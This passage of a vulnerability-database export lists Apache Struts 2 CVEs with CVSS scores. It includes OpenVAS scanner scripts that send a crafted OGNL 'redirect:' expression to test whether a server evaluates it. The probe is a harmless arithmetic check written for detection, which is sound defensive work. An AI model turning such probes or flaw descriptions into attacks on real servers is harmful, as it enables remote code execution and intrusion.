"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-04-11T01:48:41", "id": "OSV:GHSA-4QGJ-9MVG-3929", "href": "https://osv.dev/vulnerability/GHSA-4qgj-9mvg-3929", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-17T16:34:45", "description": "OGNL provides, among other features, extensive expression evaluation capabilities. This vulnerability allows a malicious user to bypass the '#'-usage protection built into the ParametersInterceptor, thus being able to manipulate server side context objects. This behavior was already addressed in [S2-003](https://cwiki.apache.org/confluence/display/WW/S2-003), but it turned out that the resulting fix based on whitelisting acceptable parameter names closed the vulnerability only partially.", "cvss3": {}, "published": "2022-05-13T01:14:26", "type": "osv", "title": "Server side object manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2023-08-17T16:34:11", "id": "OSV:GHSA-X5FC-PGPX-59J5", "href": "https://osv.dev/vulnerability/GHSA-x5fc-pgpx-59j5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2023-09-25T05:02:47", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute\narbitrary OGNL code via a request with a crafted action name that is not\nproperly handled during wildcard matching, a different vulnerability than\nCVE-2013-2135.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only affects Struts 2\n", "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2013-07-16T00:00:00", "id": "UB:CVE-2013-2134", "href": "https://ubuntu.com/security/CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T11:24:25", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard\ncookiesName value is used, does not properly restrict access to the\ngetClass method, which allows remote attackers to \"manipulate\" the\nClassLoader and execute arbitrary code via a crafted request. NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0113", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-0113", "href": "https://ubuntu.com/security/CVE-2014-0113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-27T11:27:00", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly\nrestrict access to the getClass method, which allows remote attackers to\n\"manipulate\" the ClassLoader and execute arbitrary code via a crafted\nrequest. NOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0112", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-0112", "href": "https://ubuntu.com/security/CVE-2014-0112", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-27T11:15:16", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard\ncookiesName value is used, does not properly restrict access to the\ngetClass method, which allows remote attackers to \"manipulate\" the\nClassLoader and modify session state via a crafted request. NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2014-0113.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | per Debian: <not-affected> (Struts 2.0.0 through to Struts 2.3.16.2)\n", "cvss3": {}, "published": "2014-05-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0116", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2014-05-08T00:00:00", "id": "UB:CVE-2014-0116", "href": "https://ubuntu.com/security/CVE-2014-0116", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-06-28T15:12:36", "description": "Apache Struts 2.3.1.2 and earlier, 2.3.19-2.3.23, provides interfaces that\ndo not properly restrict access to collections such as the session and\nrequest collections, which might allow remote attackers to modify run-time\ndata values via a crafted parameter to an application that implements an\naffected interface, as demonstrated by the SessionAware, RequestAware,\nApplicationAware, ServletRequestAware, ServletResponseAware, and\nParameterAware interfaces. NOTE: the vendor disputes the significance of\nthis report because of an \"easy work-around in existing apps by configuring\nthe interceptor.\"\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3631>\n * <https://issues.apache.org/jira/browse/WW-2264>\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2011-5057", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5057"], "modified": "2012-01-08T00:00:00", "id": "UB:CVE-2011-5057", "href": "https://ubuntu.com/security/CVE-2011-5057", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T14:20:59", "description": "In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an\nunintentional expression in a Freemarker tag instead of string literals can\nlead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-20T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12611", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2017-09-20T00:00:00", "id": "UB:CVE-2017-12611", "href": "https://ubuntu.com/security/CVE-2017-12611", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T14:43:21", "description": "Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE\nbefore 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single\nbyte page encoding, allows remote attackers to inject arbitrary web script\nor HTML via multi-byte characters in a url-encoded parameter.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | Only affects 2.0.0 to 2.3.24.1\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4003", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2016-04-12T00:00:00", "id": "UB:CVE-2016-4003", "href": "https://ubuntu.com/security/CVE-2016-4003", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-16T21:07:03", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/>\nvalues, which allows remote attackers to bypass the CSRF protection\nmechanism.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 2.0.0+\n", "cvss3": {}, "published": "2014-12-10T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7809", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2014-12-10T00:00:00", "id": "UB:CVE-2014-7809", "href": "https://ubuntu.com/security/CVE-2014-7809", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-13T10:43:32", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not\nproperly validate the token name configuration parameter, which allows\nremote attackers to perform cross-site request forgery (CSRF) attacks by\nsetting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2012-09-05T00:00:00", "type": "ubuntucve", "title": "CVE-2012-4386", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2012-09-05T00:00:00", "id": "UB:CVE-2012-4386", "href": "https://ubuntu.com/security/CVE-2012-4386", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-25T03:06:10", "description": "Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass\naccess controls via a crafted action: prefix.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | affects 2.0.0+\n", "cvss3": {}, "published": "2013-09-30T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2013-09-30T00:00:00", "id": "UB:CVE-2013-4310", "href": "https://ubuntu.com/security/CVE-2013-4310", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-10T22:11:52", "description": "Cross-site scripting (XSS) vulnerability in Apache Struts before 2.3.20.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | only affects Struts 2.0.0 - 2.3.16.3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5169", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2017-09-25T00:00:00", "id": "UB:CVE-2015-5169", "href": "https://ubuntu.com/security/CVE-2015-5169", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-10T22:31:56", "description": "Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate\nStruts internals, alter user sessions, or affect container settings via\nvectors involving a top object.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ratliff](<https://launchpad.net/~ratliff>) | upstream has a documented work-around \n[debian](<https://launchpad.net/~debian>) | Only affects versions >= 2.x\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-29T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5209", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2017-08-29T00:00:00", "id": "UB:CVE-2015-5209", "href": "https://ubuntu.com/security/CVE-2015-5209", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T14:37:25", "description": "Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to\nhave unspecified impact via vectors related to improper action name clean\nup.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | The advisory says \"Struts 2.0.0 - Struts 2.3.28.1\" is affected but doesn't make a positive statement why those bounds.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4436", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4436"], "modified": "2016-10-03T00:00:00", "id": "UB:CVE-2016-4436", "href": "https://ubuntu.com/security/CVE-2016-4436", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803838", "href": "http://plugins.openvas.org/nasl.php?oid=803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803838);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious url.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2.0.0 to 2.3.15\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/54118\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nres = \"\";\nreq = \"\";\nresult = \"\";\ndir = \"\";\nurl = \"\";\n\n## Get HTTP Port\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n ## Construct attack request\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:04", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310803838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803838\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name:\"insight\", value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious url.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts 2.0.0 to 2.3.15\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54118\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nasreq = 